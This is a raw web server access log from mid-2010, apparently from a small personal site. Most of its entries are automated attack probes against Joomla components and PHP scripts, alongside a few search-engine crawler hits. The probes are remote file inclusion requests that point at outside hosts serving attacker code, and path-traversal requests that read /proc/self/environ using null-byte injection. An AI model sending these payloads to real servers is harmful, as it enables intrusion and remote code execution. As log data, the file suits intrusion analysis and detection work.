89.108.64.192 - - [30/Jun/2010:19:03:20 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.812"
89.108.64.192 - - [30/Jun/2010:19:03:21 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
89.108.64.192 - - [30/Jun/2010:19:03:21 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
85.17.199.105 - - [30/Jun/2010:19:05:07 -0500] "GET /logs/access_log.1276732800//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:05:08 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:05:08 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:05:08 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:06:35 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:07:35 -0500] "GET /logs/access_log.1277164800/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:07:35 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:07:35 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:08:00 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:09:16 -0500] "GET /logs/access_log.1277164800/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:09:16 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
85.17.199.105 - - [30/Jun/2010:19:09:17 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.195.112.180 - - [30/Jun/2010:19:09:36 -0500] "GET /artwork/playhouse.htm HTTP/1.0" 200 521 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.199.105 - - [30/Jun/2010:19:09:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
75.125.254.98 - - [30/Jun/2010:19:19:03 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:19:03 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.106.247.246 - - [30/Jun/2010:19:19:21 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
75.125.254.98 - - [30/Jun/2010:19:19:49 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.106.247.246 - - [30/Jun/2010:19:19:55 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
207.46.199.180 - - [30/Jun/2010:19:20:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.113.160.20 - - [30/Jun/2010:19:21:33 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
87.118.96.160 - - [30/Jun/2010:19:23:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.118.96.160 - - [30/Jun/2010:19:23:12 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
75.125.254.98 - - [30/Jun/2010:19:23:47 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:23:47 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:23:47 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:23:47 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:23:47 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:23:47 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.834"
211.234.100.196 - - [30/Jun/2010:19:23:55 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:23:55 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:23:57 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:24:02 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
75.125.254.98 - - [30/Jun/2010:19:24:08 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:24:08 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
87.250.255.243 - - [30/Jun/2010:19:24:28 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
87.106.247.246 - - [30/Jun/2010:19:25:44 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
87.106.247.246 - - [30/Jun/2010:19:25:45 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
87.106.247.246 - - [30/Jun/2010:19:25:45 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.810"
87.106.247.246 - - [30/Jun/2010:19:26:29 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
208.113.160.20 - - [30/Jun/2010:19:26:31 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
208.113.160.20 - - [30/Jun/2010:19:26:32 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
208.113.160.20 - - [30/Jun/2010:19:26:32 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.803"
75.125.254.98 - - [30/Jun/2010:19:27:01 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:27:01 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:27:01 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.834"
87.106.247.246 - - [30/Jun/2010:19:27:03 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
87.106.247.246 - - [30/Jun/2010:19:27:03 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
87.106.247.246 - - [30/Jun/2010:19:27:04 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.810"
208.113.160.20 - - [30/Jun/2010:19:27:36 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
87.106.247.246 - - [30/Jun/2010:19:27:44 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
208.113.160.20 - - [30/Jun/2010:19:28:35 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
208.113.160.20 - - [30/Jun/2010:19:28:35 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
208.113.160.20 - - [30/Jun/2010:19:28:35 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.803"
208.113.160.20 - - [30/Jun/2010:19:29:40 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
72.47.228.18 - - [30/Jun/2010:19:34:59 -0500] "GET //index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.47.228.18 - - [30/Jun/2010:19:35:25 -0500] "GET //index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.125.254.98 - - [30/Jun/2010:19:35:37 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:35:37 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
72.47.228.18 - - [30/Jun/2010:19:36:30 -0500] "GET //index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.246.218.140 - - [30/Jun/2010:19:38:28 -0500] "GET /logs/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:19:38:28 -0500] "GET /old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:19:38:30 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:19:38:49 -0500] "GET /logs/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:19:38:49 -0500] "GET /old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.246.218.140 - - [30/Jun/2010:19:38:49 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.234.100.196 - - [30/Jun/2010:19:39:00 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:39:00 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:39:01 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.805"
67.195.112.180 - - [30/Jun/2010:19:39:11 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.234.100.196 - - [30/Jun/2010:19:39:15 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:39:16 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:39:17 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.805"
72.52.150.147 - - [30/Jun/2010:19:39:20 -0500] "GET /old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.52.150.147 - - [30/Jun/2010:19:39:20 -0500] "GET /logs/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
72.52.150.147 - - [30/Jun/2010:19:39:20 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.127.170 - - [30/Jun/2010:19:39:39 -0500] "GET /logs/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.175.127.170 - - [30/Jun/2010:19:39:39 -0500] "GET /old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.127.170 - - [30/Jun/2010:19:39:39 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.47.228.18 - - [30/Jun/2010:19:40:33 -0500] "GET /logs/access_log.1274572800//index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.47.228.18 - - [30/Jun/2010:19:40:33 -0500] "GET //index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.47.228.18 - - [30/Jun/2010:19:40:33 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:41:22 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:41:23 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:41:24 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:41:33 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:41:33 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:41:34 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.805"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:17 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.230.163.10 - - [30/Jun/2010:19:42:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
211.234.100.196 - - [30/Jun/2010:19:43:30 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:43:33 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
75.125.254.98 - - [30/Jun/2010:19:44:39 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:44:39 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:44:39 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:44:41 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:44:41 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [30/Jun/2010:19:44:41 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.834"
211.234.100.196 - - [30/Jun/2010:19:45:44 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:19:45:52 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
174.142.75.115 - - [30/Jun/2010:19:46:53 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:19:46:54 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
92.246.14.10 - - [30/Jun/2010:19:47:59 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:47:59 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:47:59 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:48:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
174.142.75.115 - - [30/Jun/2010:19:50:41 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:19:50:42 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
